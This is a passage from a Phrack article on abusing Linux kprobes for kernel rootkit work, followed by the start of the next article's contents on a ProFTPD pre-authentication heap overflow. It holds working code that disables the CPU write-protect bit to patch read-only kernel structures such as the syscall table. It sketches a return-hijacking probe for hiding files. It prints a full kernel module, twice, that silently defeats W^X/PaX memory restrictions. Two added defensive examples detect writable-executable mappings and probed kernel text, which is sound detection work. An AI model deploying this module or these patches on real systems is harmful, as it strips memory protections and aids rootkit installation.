function would have to be patched (and sadly it cannot be patched using a
kprobe), because any function with __kprobes in its prototype cannot be
patched using kprobe hooks themselves.

-- A simple patch within arch_prepare_kretprobe() 

*sara = (unsigned long)&kretprobe_trampoline; 

Could be changed to:

*sara = (unsigned long)&custom_asm_stub;

The problem is that arch_prepare_kretprobe() would have to be modified
using a technique other than kprobes, which is of course easy enough
but exceeds this paper's scope. If you are interested in doing this the
next section will give you a trick that will be necessary in doing so.


----[ 2.5 - A quick stop into modifying read-only kernel segments

If you do feel interested in hijacking arch_prepare_kretprobe()
using a function trampoline, do remember that modern Intel CPUs
have the WRITE_PROTECT bit (cr0.wp) which prevents modifications to
read-only segments, so anytime you want to modify any data structure
that resides in .rodata you will need to use the function I provide
below to modify them. The following types of data structures often
exist in the kernel's text segment:

1. void **sys_call_table
2. const struct file_operations <fs_fops_name>
3. const struct vm_ops <vma_vmops_name>
4. kernel functions

Data structures defined as 'const' will go into the .rodata section
which is at the end of the text segment, and the kernel code itself
generally exists in the .text section of the text segment. Attempting
writes to these locations will cause kernel freezes/panics/oops.

Some people modify the page table entry data for read-only pages they
want to modify, but the following functions I have provided are much
simpler, and an example will be provided below.

/* FUNCTION TO DISABLE WRITE PROTECT BIT IN CPU */
static void disable_wp(void)
{
        unsigned int cr0_value;
        
        asm volatile ("movl %%cr0, %0" : "=r" (cr0_value));
        
        /* Disable WP */
        cr0_value &= ~(1 << 16);
        
        asm volatile ("movl %0, %%cr0" :: "r" (cr0_value));

}
        
/* FUNCTION TO RE-ENABLE WRITE PROTECT BIT IN CPU */
static void enable_wp(void)
{
        unsigned int cr0_value;

        asm volatile ("movl %%cr0, %0" : "=r" (cr0_value));

        /* Enable WP */
        cr0_value |= (1 << 16);

        asm volatile ("movl %0, %%cr0" :: "r" (cr0_value));

}

So if you wanted to modify a kernel function pointer that exists within
the text segment (If it is declared const) -- I.E the sys_call_table:

	disable_wp();
	sys_call_table[__NR_write] = (void *)n_sys_write;
	enable_wp(); 

Or assuming you have a function that hijacks arch_prepare_kretprobe() using
the method discussed here [3]

	disable_wp();
	hijack_arch_prepare_kretprobe();
	enable_wp();


You get the idea. But since we've fallen a bit off track let's move into
the next section which is actually more relevant to the paper.


----[ 2.6 - An idea for a kretprobe implementation for hackers 


The primary restriction in patching the kernel should be obvious by now.
We CANNOT modify the return value in return probes (kretprobes). If someone
felt so inclined, they could (in an LKM) implement something very similar to
the kretprobe implementation. This would allow us to instrument the kernel
using kprobes and modify the return value -- therefore easily patching 
functions like filldir64 which would allow us to simply use our special
kretprobe implementation to 'return 0' if the 'char *d_name' matched a 
file we wanted to hide. 

If the reader studies /usr/src/linux/kernel/kprobes.c after reading the
above section on kretprobe implementation, it becomes apparent that a
more flexible kretprobe implementation could be designed. This is hardly
difficult if the reader followed this paper in its entirety. I simply
did not have enough time to design this feature -- a kretprobe for hackers
that allows control of the return value. Let's call this feature 'rpe'
(Return probe elite); the BASIC schematics would look like:

int register_rpe(struct kretprobe *rp)
{	
	   
	  ... <code> ...
	   rp->kp.pre_handler = pre_handler_rpe;
	   ... <code> ...
}

static int pre_handler_rpe(struct kprobe *p,
                                 struct pt_regs *regs)
{
	arch_prepare_rpe(regs);
	return 0;
}


void arch_prepare_rpe(struct pt_regs *regs)
{

	unsigned long *ret = stack_addr(regs);

        ret_addr = (kprobe_opcode_t *) *ret;

        /* Replace the return addr with trampoline addr */
        *ret = (unsigned long) &rpe_trampoline;
}

rpe_trampoline could be either an asm stub or an actual
function -- either way you would want to back up the registers
before calling your handler that does what you want --
to process data and ultimately return whatever value you want.
For instance:
    __asm__ ("movl $val, %eax\n"
	     "push $ret_addr\n"
	     "ret");

Since I did not provide an implementation for a more flexible
kretprobe, the reader may be interested in doing so. Once I
get an opportunity I intend on writing an LKM patch for one
and releasing it.


---[ 3 - Patch to unpatch W^X (mprotect/mmap restrictions)

Let's move on to a couple of other patches using the existing
kprobe features to show some usefulness other than a file hiding
mechanism. These two patches will aim at disabling the W^X feature
that is enabled in kernels -- PaX for instance calls this mprotect
restrictions. W^X is to say that an mmap segment cannot be created
or modified to be both write+execute. The patches below give us
two benefits:

1. On systems with the NX (no_exec_pages) bit set, we will be able
to do things like mark the data segment as executable and inject
code there for execution using ptrace.

2. Many ELF protectors (Burneye, Shiva, Elfcrypt, etc.) store the
encrypted executable in the text segment of the stub/loading code
and to decrypt part of a program's own text, would be considered self
modifying code -- W^X prevents this -- so with our Anti-W^X patch
we can use our ELF Protectors, and make segments such as the stack
and data segment, once again, executable on systems with the NX bit set
where mprotect/mmap restrictions really make a difference.

An important note is that due to the design nature of the following
patch, we cannot change the return values; so mprotect and mmap
will both give a return value that says they failed-- don't exit
based on error checking because your write+execute mmap and mprotect
attempts actually succeed. To test you can look at /proc/pid/maps
of the given process.			

-- tested on 2.6.18 -- 

On modern systems simply change regs->eax to regs->ax in the two necessary spots.
Also exporting the module license to GPL is not necessary to use kprobes on modern
systems.

#include <linux/kernel.h>
#include <linux/module.h>
#include <linux/kprobes.h>
#include <linux/mm.h>
#include <linux/fs.h>
#include <linux/file.h>


#define PROT_READ       0x1             /* Page can be read.  */
#define PROT_WRITE      0x2             /* Page can be written.  */
#define PROT_EXEC       0x4             /* Page can be executed.  */
#define PROT_NONE       0x0             /* Page can not be accessed.  */
#define MAP_FIXED       0x10   		

#define MAP_ANONYMOUS   0x20            /* don't use a file */
#define MAP_GROWSDOWN   0x0100          /* stack-like segment */
#define MAP_DENYWRITE   0x0800          /* ETXTBSY */
#define MAP_EXECUTABLE  0x1000          /* mark it as an executable */

/* 
 * It is preferable to write a script that gets
 * kallsyms_lookup_name() from System.map and then
 * passes it as a module parameter, but in this example
 * we just look it up and assign it our selves, so
 * make sure to change the address.
 */
unsigned long (*_kallsyms_lookup_name)(char *) = (void *)0xc043e5d0; // change this

unsigned long (*_get_unmapped_area)(struct file *file, unsigned long addr, unsigned long len,
                unsigned long pgoff, unsigned long flags);

	
static struct 
{
	int assign_wx;
	unsigned long start;
	size_t len;
	long prot;
} mprotect;

MODULE_LICENSE("GPL");

asmlinkage int kp_sys_mprotect(unsigned long start, size_t len, long prot)
{
        struct vm_area_struct *vma = current->mm->mmap;
		
	mprotect.assign_wx = 0;
	mprotect.start = start;
	mprotect.prot = prot;

	/* This doesn't concern us */
        if (!(prot & PROT_EXEC) && !(prot & PROT_WRITE))
                goto out;

        down_write(&current->mm->mmap_sem);
        
	/* Get vma for start memory area */
        vma = find_vma(current->mm, start);
	if (!vma)
		goto free_sem;

        if (prot & (PROT_WRITE|PROT_EXEC))
	{
		mprotect.assign_wx++;
		goto free_sem;
	}

	if (prot & PROT_WRITE)
        {
	        mprotect.assign_wx++;
        	goto free_sem;
	}
	
        if (prot & PROT_EXEC)
	{
		mprotect.assign_wx++;
		goto free_sem;
	}
	
	free_sem:
	up_write(&current->mm->mmap_sem);
	
	out:
	jprobe_return();
	return 0;
}

/*
 before the following function is executed, a W^X patch such as PaX
 mprotect/mmap restrictions, will have code such as:
 if ((vm_flags & (VM_WRITE | VM_EXEC)) != VM_EXEC)
                       vm_flags &= ~(VM_EXEC | VM_MAYEXEC);
               else
                       vm_flags &= ~(VM_WRITE | VM_MAYWRITE);
 
 But our return probe gets the last say in the matter. mprotect
 will return like it failed (With a positive value) but the VMA's
 or memory maps will be both write+execute, just make sure that
 you don't error checking then exit if mprotect or mmap fail 
 because they will return failed values.
*/

static int rp_mprotect(struct kretprobe_instance *ri, struct pt_regs *regs)
{
	struct vm_area_struct *vma;

	if (!mprotect.assign_wx)
		goto out;
	
	down_write(&current->mm->mmap_sem);

        /* Get vma for start memory area */
        vma = find_vma(current->mm, mprotect.start);
        if (!vma)
                goto sem_out;

	if (mprotect.prot & PROT_EXEC)
	{
		vma->vm_flags |= VM_MAYEXEC;
		vma->vm_flags |= VM_EXEC;
	}
	
	if (mprotect.prot & PROT_WRITE)
	{
		vma->vm_flags |= VM_MAYWRITE;
		vma->vm_flags |= VM_WRITE;
	}
	
	sem_out:
	up_write(&current->mm->mmap_sem);
		

	out:
	return 0;
}

struct 
{
        unsigned long addr;
#define MMAP_CLEAN 0
#define MMAP_DIRTY 1
        int mmap_prot_state;
        unsigned int len;
} do_mmap_data;

/* Return probe code for sys_mmap2 */
static int rp_mmap(struct kretprobe_instance *ri, struct pt_regs *regs)
{
        struct vm_area_struct *vma = current->mm->mmap;
        
        /* we are assuming the default function to get an unmapped region is arch_get_unmapped_topdown() */
        if (do_mmap_data.addr - regs->eax == do_mmap_data.len)
                do_mmap_data.addr = regs->eax;
        else
		goto out; // pretty unlikely

        switch(do_mmap_data.mmap_prot_state)
        {
                case MMAP_CLEAN:
                        break;
                case MMAP_DIRTY: // lets undo the work of the W^X patch :)
                        down_write(&current->mm->mmap_sem);
                        vma = find_vma(current->mm, do_mmap_data.addr);
                        if (!vma)
                                break;
			printk("Found vma's and setting all writes and exec possibilities\n");
                        vma->vm_flags |= (VM_EXEC | VM_MAYEXEC);
                        vma->vm_flags |= (VM_WRITE | VM_MAYWRITE);
                        up_write(&current->mm->mmap_sem);
                        break;
        }
	out:
	return 0;
}

asmlinkage long kp_sys_mmap2(unsigned long addr, unsigned long len, unsigned long prot, unsigned long flags,
                          unsigned long fd, unsigned long pgoff)
{

        struct file *file = NULL;
	
	printk("In sys_mmap2\n");
        do_mmap_data.len = len;

        /* We emulate a combination of sys_mmap2 and do_mmap_pgoff */
        
	/* This is the easiest scenario */
	/* because we know the mmap addr */
        if (flags & MAP_FIXED)
        {
		printk("MAP_FIXED\n");
                do_mmap_data.addr = addr;
                if ((prot & PROT_EXEC) && (prot & PROT_WRITE))
                        do_mmap_data.mmap_prot_state = MMAP_DIRTY;
                else
                        do_mmap_data.mmap_prot_state = MMAP_CLEAN;
                goto out;
        }

        flags &= ~(MAP_EXECUTABLE | MAP_DENYWRITE);
        if (!(flags & MAP_ANONYMOUS)) 
        {
                file = fget(fd);
                if (!file)
                        goto out;
        }
        
        /* mimick do_mmap_pgoff to get the linear range */
        down_write(&current->mm->mmap_sem);

        if (file) 
        {
                if (!file->f_op || !file->f_op->mmap)
                        goto sem_out;
        }

        if (!len)
                goto sem_out;

        len = PAGE_ALIGN(len);
        if (!len || len > TASK_SIZE)
                goto sem_out;

        if ((pgoff + (len >> PAGE_SHIFT)) < pgoff)
                goto sem_out;

        /* when the real sys_mmap2/do_mmap_pgoff are called 
         * they will get the next linear range 
	 * which will be at do_mmap_data.addr - do_mmap_data.len 
         * This relies on get_unmapped_area() calling arch_get_unmapped_area_topdown() 
	 */
	printk("get_unmapped_area call\n");
        addr = _get_unmapped_area(file, addr, len, 0, flags);
        printk("addr: 0x%lx\n", addr);
	do_mmap_data.addr = addr;

        if ((prot & PROT_EXEC) && (prot & PROT_WRITE))
                do_mmap_data.mmap_prot_state = MMAP_DIRTY;
	else
               	do_mmap_data.mmap_prot_state = MMAP_CLEAN;
                
        sem_out:
        up_write(&current->mm->mmap_sem);
        out:
        jprobe_return();
        return 0;

}

static struct jprobe sys_mmap2_jprobe = 
{
        .entry = (kprobe_opcode_t *)kp_sys_mmap2
};

static struct jprobe sys_mprotect_jprobe =
{
	.entry = (kprobe_opcode_t *)kp_sys_mprotect
};

static struct kretprobe mprotect_kretprobe = 
{
        .handler  = rp_mprotect,
	.maxactive = 1 // this code isn't really SMP reliable
};

static struct kretprobe mmap_kretprobe =
{
        .handler = rp_mmap,
        .maxactive = 1 // this code isn't really SMP reliable
};


void exit_module(void)
{
	unregister_jprobe(&sys_mmap2_jprobe);
        unregister_jprobe(&sys_mprotect_jprobe);

        unregister_kretprobe(&mprotect_kretprobe);
        unregister_kretprobe(&mmap_kretprobe);
}

int init_module(void)
{
	int j = 0, k = 0;

	_get_unmapped_area = (void *)_kallsyms_lookup_name("arch_get_unmapped_area_topdown");
	
	sys_mmap2_jprobe.kp.addr = (void *)_kallsyms_lookup_name("sys_mmap2");
	/* Register our jprobes */
	if (register_jprobe(&sys_mmap2_jprobe) < 0)
		goto jfail;
	j++;

	sys_mprotect_jprobe.kp.addr = (void *)_kallsyms_lookup_name("sys_mprotect");
	if (register_jprobe(&sys_mprotect_jprobe) < 0)
		goto jfail;
	
	mprotect_kretprobe.kp.addr = (void *)_kallsyms_lookup_name("sys_mprotect");
	/* Register our kretprobes */
	if (register_kretprobe(&mprotect_kretprobe) < 0)
		goto kfail;
	k++;
	
	mmap_kretprobe.kp.addr = (void *)_kallsyms_lookup_name("sys_mmap2");
	if (register_kretprobe(&mmap_kretprobe) < 0)
		goto kfail;
	
	return 0;

	jfail:
		
		printk(KERN_EMERG "register_jprobe failed for %s\n", (!j ? "sys_mmap2" : "sys_mprotect"));
	kfail:
		printk(KERN_EMERG "register_kretprobe failed for %s\n", (!k ? "mprotect" : "mmap"));

	return -1;
}

	
module_exit(exit_module);

--- end of code ---
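
From the defender's side, the note above matters: the mprotect/mmap return
value is not ground truth, /proc/pid/maps is. The following is an added
example (not code from the paper) that scans maps text for mappings that are
both writable and executable; the sample lines and the names find_wx,
wx_region and SAMPLE_MAPS are constructed for illustration.

```c
#include <stdio.h>
#include <string.h>

struct wx_region {
    unsigned long long start, end;
    char path[64];              /* "[anon]" when the mapping has no name */
};

/* Constructed sample in /proc/<pid>/maps format (32-bit layout). */
static const char SAMPLE_MAPS[] =
    "08048000-08049000 r-xp 00000000 08:01 1234 /tmp/demo\n"
    "08049000-0804a000 rwxp 00000000 08:01 1234 /tmp/demo\n"
    "b7f00000-b7f01000 rwxp 00000000 00:00 0\n"
    "bffeb000-c0000000 rw-p bffeb000 00:00 0 [stack]\n";

/* Scan maps text; record every mapping whose perms contain both w and x. */
size_t find_wx(const char *maps, struct wx_region *out, size_t max_out)
{
    size_t n = 0;
    const char *p = maps;

    while (*p != '\0' && n < max_out) {
        const char *eol = strchr(p, '\n');
        size_t len = eol ? (size_t)(eol - p) : strlen(p);
        char line[256], perms[5], path[64];
        unsigned long long start, end;

        if (len < sizeof(line)) {       /* over-long lines are skipped */
            memcpy(line, p, len);
            line[len] = '\0';
            path[0] = '\0';
            /* fields: start-end perms offset dev inode [pathname] */
            int got = sscanf(line, "%llx-%llx %4s %*s %*s %*s %63s",
                             &start, &end, perms, path);
            if (got >= 3 && strlen(perms) == 4 &&
                perms[1] == 'w' && perms[2] == 'x') {
                out[n].start = start;
                out[n].end = end;
                strcpy(out[n].path, path[0] ? path : "[anon]");
                n++;
            }
        }
        p += len;
        if (*p == '\n')
            p++;
    }
    return n;
}

int main(void)
{
    struct wx_region r[8];
    size_t i, n = find_wx(SAMPLE_MAPS, r, 8);

    for (i = 0; i < n; i++)
        printf("W+X mapping %08llx-%08llx %s\n",
               r[i].start, r[i].end, r[i].path);
    return 0;
}
```

On a host where W^X is enforced, any hit from this check on a process that
was not expected to hold such mappings is worth correlating with loaded
modules and registered probes.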


---[ 4 - Notes on rootkit detection for kprobes

If a kernel rootkit is designed solely using kprobes and properly hides
itself from the kprobe entries in sysfs, then a rootkit detection program
can still easily detect what kernel functions have been hooked. I will
leave this obvious solution to anyone interested in adding this feature
to their detectors but the answer lies in this paper as well as the kprobe
documentation.
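
One way to build such a check, as an added example (not code from the paper):
the kprobe documentation states that a probe replaces the first byte of the
probed instruction with a breakpoint (int3, 0xCC on x86), and optimized
kprobes replace it with a jump, so comparing live kernel text against a
trusted copy reveals probed functions. The byte images, offsets and the names
scan_text, sym and finding are constructed for illustration; acquiring the
live and reference text is assumed to happen elsewhere.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

enum hook_kind { HOOK_NONE, HOOK_INT3, HOOK_JMP, HOOK_OTHER };

struct sym {                /* one function from the trusted symbol table */
    const char *name;
    size_t off;             /* offset of the function in the text image */
    size_t len;             /* function size in bytes */
};

struct finding {
    const char *name;
    size_t off;             /* first modified byte, relative to the function */
    enum hook_kind kind;
};

/* Classify the first byte that differs between trusted and live text. */
static enum hook_kind classify(const uint8_t *ref, const uint8_t *live,
                               size_t len, size_t *where)
{
    size_t i;

    for (i = 0; i < len; i++) {
        if (ref[i] == live[i])
            continue;
        *where = i;
        if (live[i] == 0xCC)                    /* int3: kprobe breakpoint */
            return HOOK_INT3;
        if (live[i] == 0xE9 && len - i >= 5)    /* jmp rel32: optimized probe
                                                   or function trampoline */
            return HOOK_JMP;
        return HOOK_OTHER;
    }
    return HOOK_NONE;
}

size_t scan_text(const uint8_t *ref, const uint8_t *live, size_t image_len,
                 const struct sym *syms, size_t nsyms,
                 struct finding *out, size_t max_out)
{
    size_t i, n = 0;

    for (i = 0; i < nsyms && n < max_out; i++) {
        size_t where = 0;
        enum hook_kind k;

        /* Skip symbols that fall outside the image (overflow-safe check). */
        if (syms[i].off > image_len || syms[i].len > image_len - syms[i].off)
            continue;
        k = classify(ref + syms[i].off, live + syms[i].off,
                     syms[i].len, &where);
        if (k == HOOK_NONE)
            continue;
        out[n].name = syms[i].name;
        out[n].off = where;
        out[n].kind = k;
        n++;
    }
    return n;
}

/* Constructed data: filler bytes, not real kernel code or real offsets. */
size_t demo_scan(struct finding *out, size_t max_out)
{
    static const uint8_t ref[48] = {
        0x55,0x89,0xe5,0x83,0xec,0x08,0x8b,0x45,0x08,0x89,0x04,0x24,0x31,0xc0,0xc9,0xc3,
        0x55,0x89,0xe5,0x57,0x56,0x53,0x83,0xec,0x1c,0x8b,0x45,0x08,0x5b,0x5e,0x5f,0xc3,
        0x55,0x89,0xe5,0x53,0x83,0xec,0x14,0x8b,0x5d,0x08,0x85,0xdb,0x74,0x02,0xc9,0xc3
    };
    static const struct sym syms[] = {
        { "filldir64",    0,  16 },
        { "sys_mprotect", 16, 16 },
        { "sys_mmap2",    32, 16 },
        { "out_of_range", 40, 64 },     /* rejected by the bounds check */
    };
    static const uint8_t jmp[5] = { 0xe9, 0x10, 0x20, 0x30, 0x40 };
    uint8_t live[sizeof(ref)];

    memcpy(live, ref, sizeof(ref));
    live[16] = 0xCC;                    /* breakpoint at function entry */
    memcpy(live + 32, jmp, sizeof(jmp));/* jump written over function entry */
    return scan_text(ref, live, sizeof(ref), syms,
                     sizeof(syms) / sizeof(syms[0]), out, max_out);
}

int main(void)
{
    static const char *kinds[] = { "none", "int3", "jmp", "other" };
    struct finding f[8];
    size_t i, n = demo_scan(f, 8);

    for (i = 0; i < n; i++)
        printf("%s+%zu modified (%s)\n", f[i].name, f[i].off, kinds[f[i].kind]);
    return 0;
}
```

Differences classified as "other" need manual review, since the kernel also
patches its own text for legitimate reasons.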


---[ 5 - Summing it all up

We have seen that the kprobe interface, which is primarily implemented
for kernel debugging, can be used to instrument the kernel in some
interesting ways. We have explored kprobes' strengths and weaknesses, and
provided several examples of weakening the kernel by patching it using
jprobe and kretprobe techniques. We also went over some ideas for
implementing a more hacker friendly kretprobe implementation (although we
did not provide one).

It is also important to mention to people who are engineering security code
that kprobes can also be used to debug kernel code, as well as install simple
patches for hardening the kernel. But phrack isn't about that, so patches
to harden the kernel were not included -- just know that it is possible.


---[ 6 - Greetz

kad - thanks for encouraging me to write this, and being cool guy with
priceless skills and good advice.

Silvio - My initial inspiration for kernel and ELF hacking all started with you.
You've been a good friend and mentor, many many thanks.

chrak - My long time friend and occasional coding partner. 13yrs ago this guy
helped me write my first backdoor program for Linux.

nynex - I owe you for hosting my stuff and being a good friend.

mayhem - For writing some really cool ELF code and being an inspiration.

grugq - Your original AF work has been an inspiration as well.

halfdead - For knowing everything about the universe and our realm *literally*

jimjones (UNIX Terrorist) - you will be getting a copy of this soon, word.

All of the digitalnerds -- especially halfdead, scrippie, pronsa and abh.

#bitlackeys on EFnet, a small and strange little channel with people whom
I've been friends with for years.

#formal on a secret network with extremely smart people and good conversation.

RuxCon folk are pretty much all awesome too, thanks.


---[ 7 - References

Please note that I did not use any references other than code and official
documentation for this paper, but the following papers are quite relevant and
since I have read them (along with many other great papers) they all play a
role in my collective knowledge of kernel malware and rootkit exploration.

[1] kad - Handling interrupt descriptor table for fun and profit
          http://www.phrack.org/issues.html?issue=59&id=4#article

[2] Halfdead - Mystifying the debugger for ultimate stealthness 
               http://www.phrack.org/issues.html?issue=65&id=8#article 

[3] Silvio - Kernel function hijacking (Function trampolines)
             http://vxheavens.com/lib/vsc08.html 


---[ 8 - Code

/*
	Tested on 2.6.18 kernel, on modern kernels change regs->eax to regs->ax.	
	From the ElfMaster, 2010.

Makefile:

obj-m += w_plus_x.o

MODULES = w_plus_x.ko

all: clean $(MODULES)

$(MODULES):
        make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules

clean:
        rm -f *.o *.ko Module.markers Module.symvers w_plus_x*.mod.c modules.order


*/


#include <linux/kernel.h>
#include <linux/module.h>
#include <linux/kprobes.h>
#include <linux/mm.h>
#include <linux/fs.h>
#include <linux/file.h>


#define PROT_READ       0x1             /* Page can be read.  */
#define PROT_WRITE      0x2             /* Page can be written.  */
#define PROT_EXEC       0x4             /* Page can be executed.  */
#define PROT_NONE       0x0             /* Page can not be accessed.  */
#define MAP_FIXED       0x10   		

#define MAP_ANONYMOUS   0x20            /* don't use a file */
#define MAP_GROWSDOWN   0x0100          /* stack-like segment */
#define MAP_DENYWRITE   0x0800          /* ETXTBSY */
#define MAP_EXECUTABLE  0x1000          /* mark it as an executable */

/* 
 * It is preferable to write a script that gets
 * kallsyms_lookup_name() from System.map and then
 * passes it as a module parameter, but in this example
 * we just look it up and assign it our selves, so
 * make sure to change the address.
 */
unsigned long (*_kallsyms_lookup_name)(char *) = (void *)0xc043e5d0; // change this

unsigned long (*_get_unmapped_area)(struct file *file, unsigned long addr, unsigned long len,
                unsigned long pgoff, unsigned long flags);

	
static struct 
{
	int assign_wx;
	unsigned long start;
	size_t len;
	long prot;
} mprotect;

MODULE_LICENSE("GPL");

asmlinkage int kp_sys_mprotect(unsigned long start, size_t len, long prot)
{
        struct vm_area_struct *vma = current->mm->mmap;
		
	mprotect.assign_wx = 0;
	mprotect.start = start;
	mprotect.prot = prot;

	/* This doesn't concern us */
        if (!(prot & PROT_EXEC) && !(prot & PROT_WRITE))
                goto out;

        down_write(&current->mm->mmap_sem);
        
	/* Get vma for start memory area */
        vma = find_vma(current->mm, start);
	if (!vma)
		goto free_sem;

        if (prot & (PROT_WRITE|PROT_EXEC))
	{
		mprotect.assign_wx++;
		goto free_sem;
	}

	if (prot & PROT_WRITE)
        {
	        mprotect.assign_wx++;
        	goto free_sem;
	}
	
        if (prot & PROT_EXEC)
	{
		mprotect.assign_wx++;
		goto free_sem;
	}
	
	free_sem:
	up_write(&current->mm->mmap_sem);
	
	out:
	jprobe_return();
	return 0;
}

/*
 before the following function is executed, a W^X patch such as PaX
 mprotect/mmap restrictions, will have code such as:
 if ((vm_flags & (VM_WRITE | VM_EXEC)) != VM_EXEC)
                       vm_flags &= ~(VM_EXEC | VM_MAYEXEC);
               else
                       vm_flags &= ~(VM_WRITE | VM_MAYWRITE);
 
 But our return probe gets the last say in the matter. mprotect
 will return like it failed (With a positive value) but the VMA's
 or memory maps will be both write+execute, just make sure that
 you don't error checking then exit if mprotect or mmap fail 
 because they will return failed values.
*/

static int rp_mprotect(struct kretprobe_instance *ri, struct pt_regs *regs)
{
	struct vm_area_struct *vma;

	if (!mprotect.assign_wx)
		goto out;
	
	down_write(&current->mm->mmap_sem);

        /* Get vma for start memory area */
        vma = find_vma(current->mm, mprotect.start);
        if (!vma)
                goto sem_out;

	if (mprotect.prot & PROT_EXEC)
	{
		vma->vm_flags |= VM_MAYEXEC;
		vma->vm_flags |= VM_EXEC;
	}
	
	if (mprotect.prot & PROT_WRITE)
	{
		vma->vm_flags |= VM_MAYWRITE;
		vma->vm_flags |= VM_WRITE;
	}
	
	sem_out:
	up_write(&current->mm->mmap_sem);
		

	out:
	return 0;
}

struct 
{
        unsigned long addr;
#define MMAP_CLEAN 0
#define MMAP_DIRTY 1
        int mmap_prot_state;
        unsigned int len;
} do_mmap_data;

/* Return probe code for sys_mmap2 */
static int rp_mmap(struct kretprobe_instance *ri, struct pt_regs *regs)
{
        struct vm_area_struct *vma = current->mm->mmap;
        
        /* we are assuming the default function to get an unmapped region is arch_get_unmapped_topdown() */
        if (do_mmap_data.addr - regs->eax == do_mmap_data.len)
                do_mmap_data.addr = regs->eax;
        else
		goto out; // pretty unlikely

        switch(do_mmap_data.mmap_prot_state)
        {
                case MMAP_CLEAN:
                        break;
                case MMAP_DIRTY: // lets undo the work of the W^X patch :)
                        down_write(&current->mm->mmap_sem);
                        vma = find_vma(current->mm, do_mmap_data.addr);
                        if (!vma)
                                break;
			printk("Found vma's and setting all writes and exec possibilities\n");
                        vma->vm_flags |= (VM_EXEC | VM_MAYEXEC);
                        vma->vm_flags |= (VM_WRITE | VM_MAYWRITE);
                        up_write(&current->mm->mmap_sem);
                        break;
        }
	out:
	return 0;
}

asmlinkage long kp_sys_mmap2(unsigned long addr, unsigned long len, unsigned long prot, unsigned long flags,
                          unsigned long fd, unsigned long pgoff)
{

        struct file *file = NULL;
	
	printk("In sys_mmap2\n");
        do_mmap_data.len = len;

        /* We emulate a combination of sys_mmap2 and do_mmap_pgoff */
        
	/* This is the easiest scenario */
	/* because we know the mmap addr */
        if (flags & MAP_FIXED)
        {
		printk("MAP_FIXED\n");
                do_mmap_data.addr = addr;
                if ((prot & PROT_EXEC) && (prot & PROT_WRITE))
                        do_mmap_data.mmap_prot_state = MMAP_DIRTY;
                else
                        do_mmap_data.mmap_prot_state = MMAP_CLEAN;
                goto out;
        }

        flags &= ~(MAP_EXECUTABLE | MAP_DENYWRITE);
        if (!(flags & MAP_ANONYMOUS)) 
        {
                file = fget(fd);
                if (!file)
                        goto out;
        }
        
        /* mimick do_mmap_pgoff to get the linear range */
        down_write(&current->mm->mmap_sem);

        if (file) 
        {
                if (!file->f_op || !file->f_op->mmap)
                        goto sem_out;
        }

        if (!len)
                goto sem_out;

        len = PAGE_ALIGN(len);
        if (!len || len > TASK_SIZE)
                goto sem_out;

        if ((pgoff + (len >> PAGE_SHIFT)) < pgoff)
                goto sem_out;

        /* when the real sys_mmap2/do_mmap_pgoff are called 
         * they will get the next linear range 
	 * which will be at do_mmap_data.addr - do_mmap_data.len 
         * This relies on get_unmapped_area() calling arch_get_unmapped_area_topdown() 
	 */
	printk("get_unmapped_area call\n");
        addr = _get_unmapped_area(file, addr, len, 0, flags);
        printk("addr: 0x%lx\n", addr);
	do_mmap_data.addr = addr;

        if ((prot & PROT_EXEC) && (prot & PROT_WRITE))
                do_mmap_data.mmap_prot_state = MMAP_DIRTY;
	else
               	do_mmap_data.mmap_prot_state = MMAP_CLEAN;
                
        sem_out:
        up_write(&current->mm->mmap_sem);
        out:
        jprobe_return();
        return 0;

}

static struct jprobe sys_mmap2_jprobe = 
{
        .entry = (kprobe_opcode_t *)kp_sys_mmap2
};

static struct jprobe sys_mprotect_jprobe =
{
	.entry = (kprobe_opcode_t *)kp_sys_mprotect
};

static struct kretprobe mprotect_kretprobe = 
{
        .handler  = rp_mprotect,
	.maxactive = 1 // this code isn't really SMP reliable
};

static struct kretprobe mmap_kretprobe =
{
        .handler = rp_mmap,
        .maxactive = 1 // this code isn't really SMP reliable
};


void exit_module(void)
{
	unregister_jprobe(&sys_mmap2_jprobe);
        unregister_jprobe(&sys_mprotect_jprobe);

        unregister_kretprobe(&mprotect_kretprobe);
        unregister_kretprobe(&mmap_kretprobe);
}

int init_module(void)
{
	int j = 0, k = 0;

	_get_unmapped_area = (void *)_kallsyms_lookup_name("arch_get_unmapped_area_topdown");
	
	sys_mmap2_jprobe.kp.addr = (void *)_kallsyms_lookup_name("sys_mmap2");
	/* Register our jprobes */
	if (register_jprobe(&sys_mmap2_jprobe) < 0)
		goto jfail;
	j++;

	sys_mprotect_jprobe.kp.addr = (void *)_kallsyms_lookup_name("sys_mprotect");
	if (register_jprobe(&sys_mprotect_jprobe) < 0)
		goto jfail;
	
	mprotect_kretprobe.kp.addr = (void *)_kallsyms_lookup_name("sys_mprotect");
	/* Register our kretprobes */
	if (register_kretprobe(&mprotect_kretprobe) < 0)
		goto kfail;
	k++;
	
	mmap_kretprobe.kp.addr = (void *)_kallsyms_lookup_name("sys_mmap2");
	if (register_kretprobe(&mmap_kretprobe) < 0)
		goto kfail;
	
	return 0;

	jfail:
		
		printk(KERN_EMERG "register_jprobe failed for %s\n", (!j ? "sys_mmap2" : "sys_mprotect"));
	kfail:
		printk(KERN_EMERG "register_kretprobe failed for %s\n", (!k ? "mprotect" : "mmap"));

	return -1;
}

	
module_exit(exit_module);

----EOF----


--------------------------------------------------------------------------------


                              ==Phrack Inc.==

                Volume 0x0e, Issue 0x43, Phile #0x07 of 0x10

|=-----------------------------------------------------------------------=|
|=------=[ ProFTPD with mod_sql pre-authentication, remote root  ]=------=|
|=-------------------------=[ heap overflow ]=---------------------------=|
|=-----------------------------------------------------------------------=|
|=-------------------=[ max_packetz@felinemenace.org ]=------------------=|
|=-----------------------------------------------------------------------=|

--[ Contents

  1 - Introduction 

  2 - The vulnerability
   2.1 - Tags explained
   2.2 - Generating overflow strings

  3 - Exploring what we can control
   3.1 - Automating tasks
   3.2 - ProFTPD Pool allocator
   3.3 - Examining backtraces
    3.3.1 - 11380f2c8ce44d29b93b9bc6308692ae backtrace
    3.3.2 - 2813d637d735be610a460a75db061f6b backtrace
    3.3.3 - 3d10e2a054d8124ab4de5b588c592830 backtrace
    3.3.4 - 844319188798d7742af43d10f6541a61 backtrace 
    3.3.5 - 914b175392625fe75c2b16dc18bfb250 backtrace
    3.3.6 - b975726b4537662f3f5ddf377ea26c20 backtrace
    3.3.7 - ccbbd918ad0dbc7a869184dc2eb9cc50 backtrace
    3.3.8 - f1bfd5428c97b9d68a4beb6fb8286b70 backtrace
    3.3.9 - Summary
   3.4 - Exploitation avenues
